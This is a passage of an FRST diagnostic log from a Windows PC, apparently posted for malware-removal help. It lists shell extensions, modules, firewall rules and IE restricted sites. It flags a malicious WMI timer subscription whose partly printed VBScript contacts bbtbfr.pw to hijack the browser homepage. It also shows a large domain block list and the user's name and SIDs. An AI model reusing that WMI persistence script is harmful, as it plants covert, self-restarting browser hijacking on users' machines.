MSN ZdravĂ a fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.4.336_x64__8wekyb3d8bbwe [2015-07-18] (Microsoft Corporation) [MS Ad]
MSN ZprĂˇvy -> C:\Program Files\WindowsApps\Microsoft.BingNews_3.0.4.344_x64__8wekyb3d8bbwe [2016-04-27] (Microsoft Corporation) [MS Ad]
Video -> C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2.6.446.0_x64__8wekyb3d8bbwe [2015-11-05] (Microsoft Corporation) [MS Ad]
VĂ˝bÄ›r prohlĂĹľeÄŤe -> C:\WINDOWS\BrowserChoice [2014-04-29] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation)
ShellExecuteHooks: No Name - {E080595E-3381-11E7-A376-64006A5CFC23} - -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2011-09-16] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers1: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers1: [JZContextMenuExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers2: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2011-09-16] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2014-11-20] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2015-08-27] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [igfxOSP] -> {FA507C3F-30C6-4DCA-9EE5-2656072EEC14} => C:\WINDOWS\system32\igfxOSP.dll [2015-08-27] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2013-12-01] (win.rar GmbH -> Alexander Roshal)

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== ATTENTION
WMI:subscription\ActiveScriptEventConsumer->ASEC::[ScriptText => Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (the data entry has 2410 more characters).] <==== ATTENTION

Shortcut: C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com

==================== Loaded Modules (Whitelisted) ==============

2016-05-18 19:52 - 2016-05-18 19:52 - 000048640 _____ () [File not signed] C:\WINDOWS\mmfs.dll
2016-05-18 19:52 - 2016-05-18 19:52 - 000016384 _____ () [File not signed] C:\WINDOWS\runservice.exe
2015-01-01 20:13 - 2015-01-01 20:13 - 003054592 _____ (BitTorrent Inc.) [File not signed] C:\Users\Radim\AppData\Roaming\uTorrent\uTorrent.exe
2014-04-29 17:34 - 2014-04-29 17:33 - 000327680 ____N (IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\STacSV64.exe
2011-09-16 19:35 - 2011-09-16 19:35 - 000082432 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2014-04-29 13:50 - 2014-04-29 16:50 - 000465920 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\ISDI2.dll
2014-04-29 13:50 - 2014-04-29 16:50 - 000269824 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\PsiData.dll
2012-12-10 14:31 - 2012-12-10 14:31 - 000732160 _____ (Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
2018-03-19 14:18 - 2018-03-19 14:17 - 001548288 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 000395776 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2018-03-19 14:18 - 2018-03-19 14:17 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 001177600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2018-03-19 14:18 - 2018-03-19 14:18 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\100sexlinks.com -> 100sexlinks.com

There are 4788 more sites.

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2019-07-24 12:56 - 000000826 _____ C:\WINDOWS\system32\drivers\etc\hosts

2019-07-30 00:43 - 2019-07-30 00:43 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files (x86)\AMD\ATI.ACE\Core-Static;C:\Program Files (x86)\Skype\Phone\
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Control Panel\Desktop\\Wallpaper -> C:\Users\Radim\Pictures\Tropico 4\1749340.jpg
DNS Servers: 10.255.255.10 - 10.255.255.20
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName2 -> ndptsp.tsp (No File)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKLM\...\StartupApproved\Run32: => "BtTray"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\StartupFolder: => "Facebook Gameroom.lnk"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "Windows"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "RGSC"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "se"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "Flvto YouTube Downloader"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartupApproved\Run: => "Discord"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{506D5F42-5777-4088-92CA-B408847957D4}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE (CyberLink -> CyberLink Corp.)
FirewallRules: [{17C9FA09-0EED-4FE9-8E0F-C961DAE3217C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE (CyberLink -> CyberLink Corp.)
FirewallRules: [{2C14EE3F-5540-4699-97E1-960C063A3055}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{EB32B93E-A7A4-4924-B3DF-B03FCE7498F1}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{DAAB13BD-B614-4EF0-9BC9-ABFC7445A721}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing -> )
FirewallRules: [{3E0C05B4-99E1-4923-BCF4-9679AE4DD4E5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing -> )
FirewallRules: [{CDDD8BAD-C350-404E-8ECD-C5FAE94CC644}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [{AC397966-41E4-400F-AF53-5EDEB5C3E3E3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [{5D2118AE-E221-4541-8232-0E107FF9D08D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing -> )
FirewallRules: [{53E4D907-00CC-4013-8C15-D42A82E92AFC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing -> )
FirewallRules: [TCP Query User{B7CA29F3-7D70-4D00-A1D4-EE581A2C360F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{ECB2A13D-8978-4628-A6AE-8584E5759460}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{837F5D77-3A24-490F-9848-315A163977D9}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe (Take-Two Interactive Software, Inc. -> Take-Two Interactive Software, Inc.)
FirewallRules: [{53EDEEC5-42A0-45DB-A9D9-D4018196FC6C}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe (Take-Two Interactive Software, Inc. -> Take-Two Interactive Software, Inc.)
FirewallRules: [TCP Query User{1127BB99-E6C4-4B20-B9D6-1BAE38A00AAF}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Block) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [UDP Query User{5BF00EA2-8DA9-4D69-ACBB-9B45F9D2173E}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Block) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [{8D8281C9-EAB9-476F-8623-42C8B7E045C2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Napoleon Total War\Napoleon.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [{6CE6FD90-8D01-4738-960B-D972A5337C92}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Napoleon Total War\Napoleon.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [{540E9876-7DCC-4EBD-B228-69E9922A7DAC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1FC70DBA-C417-43D2-9D60-AB89B1EE139C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{31772069-9A7A-4AEC-864A-4DAF7DA825E4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{25301E73-F700-4C40-BF17-8AD70935F1DD}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D8EA10CC-375B-4E7C-AC18-ACD005ABDA26}] => (Allow) C:\Users\Radim\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) [File not signed]
FirewallRules: [{FD791AB8-8F76-4A38-80A1-9A645790F9DF}] => (Allow) C:\Users\Radim\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) [File not signed]
FirewallRules: [TCP Query User{F52CC98F-AB27-4509-98A4-BF897C21DA32}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Allow) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [UDP Query User{EB566BCF-694E-482C-92CC-3EC25705E3B9}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Allow) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [{544617DD-4CDC-4476-88ED-CD6751D3C02E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Empire Total War\Empire.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [{52E635C6-E427-452A-B874-820DFDF74CE6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Empire Total War\Empire.exe (Sega Europe Limited -> The Creative Assembly Ltd)
FirewallRules: [TCP Query User{52B783BA-69B5-4064-823F-D844A6509FA3}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [UDP Query User{D4B81CC3-96CF-4E4F-9080-103B27332AEB}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6B93792A-F3D1-4C0E-98CF-8E60A010DD1A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{AFE4B1B0-7E13-4095-ACEF-60C7ED2DA7DB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{4190D995-33D5-4475-82D9-F4DACB54F2E6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW-BI.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{DB685A4E-594F-4E72-8185-DE4109839429}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Rome Total War Gold\RomeTW-BI.exe (The Creative Assembly Ltd) [File not signed]
FirewallRules: [{B35168EA-557D-4C12-9C65-F6F7F7162A03}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [{DA4CFA85-C471-4C99-84F2-FB4941439ED2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Duty Modern Warfare 2\iw4sp.exe (Valve Corp. -> ) [File not signed]
FirewallRules: [TCP Query User{34E6E18C-B592-447C-A605-FD632CE6E759}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [UDP Query User{ECED3CF5-4837-420C-8209-1FB882FFA3A7}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [TCP Query User{F4382A3C-3DC2-4EBB-8B48-F40D2B096922}C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe] => (Block) C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe (Blue Byte Software) [File not signed]
FirewallRules: [UDP Query User{5CEA6FBF-A395-408B-9EAC-1ACB5DAEC859}C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe] => (Block) C:\program files (x86)\ubisoft\blue byte\the settlers - dÄ›dictvĂ krĂˇlĹŻ\bin\settlershok.exe (Blue Byte Software) [File not signed]
FirewallRules: [{5AED197E-696C-4C4A-8364-F39B91A7DAFE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Amnesia.exe () [File not signed]
FirewallRules: [{00C6B48D-926F-48B7-A102-0A1A7880012D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Amnesia.exe () [File not signed]
FirewallRules: [{2C5A5DF9-1EEC-4179-824B-E53F2E62B647}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Launcher.exe () [File not signed]
FirewallRules: [{67BE3012-560A-4A92-B77F-F82F7760279D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Amnesia The Dark Descent\Launcher.exe () [File not signed]
FirewallRules: [{5DB23253-BB62-4349-AD6D-65F9B043EC79}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War 2\DOW2.exe (Sega Corporation) [File not signed]
FirewallRules: [{BD5CE768-4E2D-4826-9257-4707F9F6916B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War 2\DOW2.exe (Sega Corporation) [File not signed]
FirewallRules: [{25A09C6F-DA1E-4C00-92B3-E03325B925D2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe (Sega Corporation) [File not signed]
FirewallRules: [{84FD460A-FE88-494A-A65E-6960A393A2BC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe (Sega Corporation) [File not signed]
FirewallRules: [{6C582A34-637A-4814-B48B-AA4982AF87D0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Gold\W40k.exe (Sega Corporation) [File not signed]
FirewallRules: [{110FCA80-14F9-4DEB-8C45-D5029D217267}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Dawn of War Gold\W40k.exe (Sega Corporation) [File not signed]
FirewallRules: [{F54D83FE-23B2-47C1-9A6D-C1E98842A4EF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tom Clancy's Ghost Recon Phantoms - EU\Launcher.exe (Ubisoft Divertissement Inc -> Ubisoft)
FirewallRules: [{EBC8A5DD-97D3-40A9-9374-8F0F35242182}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tom Clancy's Ghost Recon Phantoms - EU\Launcher.exe (Ubisoft Divertissement Inc -> Ubisoft)
FirewallRules: [{8B1DE82F-F2DE-4719-8FD5-DE910C16F324}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Men of War - Demo\mow_demo.exe (1C Company -> "Best Way" Corp)
FirewallRules: [{6C47A8D4-6B72-4C5F-A3B3-43FB218B6166}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Men of War - Demo\mow_demo.exe (1C Company -> "Best Way" Corp)
FirewallRules: [{0EBD257C-5CCC-42BF-BC10-4EC2B1633B66}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Juarez - Bound in Blood SP Demo\CoJBiBDemo_x86.exe (Techland -> Techland)
FirewallRules: [{3CAB76EA-4128-491D-894E-462005161B86}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Call of Juarez - Bound in Blood SP Demo\CoJBiBDemo_x86.exe (Techland -> Techland)
FirewallRules: [{8D52A4C8-C785-4504-A0CC-0D2DC3B9CB71}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tropico 4 - Demo\Tropico4-demo.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{F19061D1-F833-4BDD-932C-36EBE559458E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Tropico 4 - Demo\Tropico4-demo.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{3F7F8A03-313A-457F-8DC1-FEFFB1B79F79}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\CoJ Gunslinger\CoJGunslinger_demo.exe (TECHLAND SP Z O O -> Techland)
FirewallRules: [{87A057D8-194D-4723-881A-B5587BD1CAD2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\CoJ Gunslinger\CoJGunslinger_demo.exe (TECHLAND SP Z O O -> Techland)
FirewallRules: [{169CBFF4-8A47-4421-AA28-E2F6AC71DD6F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2 Demo\payday2_win32_release.exe () [File not signed]
FirewallRules: [{D00718CB-70B1-472C-AA8B-F16C974EB7F3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2 Demo\payday2_win32_release.exe () [File not signed]
FirewallRules: [{E6100418-94C6-41F0-9AE5-3999D27DA3A5}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\xrEngine.exe () [File not signed]
FirewallRules: [{F58A3E8A-A3B4-4C85-84F0-FE9348A6BD40}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\xrEngine.exe () [File not signed]
FirewallRules: [{56DF3D33-CD58-4F28-B6D7-C3D51ED8956A}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [{10375979-C1C0-4110-9492-F1A612B45D37}] => (Allow) C:\Program Files (x86)\GSC World Publishing\S.T.A.L.K.E.R. - Call of Pripyat\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [{4166C9F4-F6D2-4B50-9BEC-E7C08FBC581E}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\xrEngine.exe (GSC Game World -> )
FirewallRules: [{A945C06C-3BE7-4B67-B296-9E73F715B998}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\xrEngine.exe (GSC Game World -> )
FirewallRules: [{02DAC774-6725-4A59-932D-F685E6B14CCE}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [{A17EA508-1BEA-40A6-B486-EE191C94E90E}] => (Allow) C:\Program Files (x86)\Deep Silver\S.T.A.L.K.E.R. - Clear Sky\bin\dedicated\xrEngine.exe (GSC Game World -> )
FirewallRules: [TCP Query User{79A59D3C-0DC2-4771-B2B6-0A5CB113EA01}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Block) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
FirewallRules: [UDP Query User{AFEB7F2E-2BB5-443C-BDAB-999EA4C1A183}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Block) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
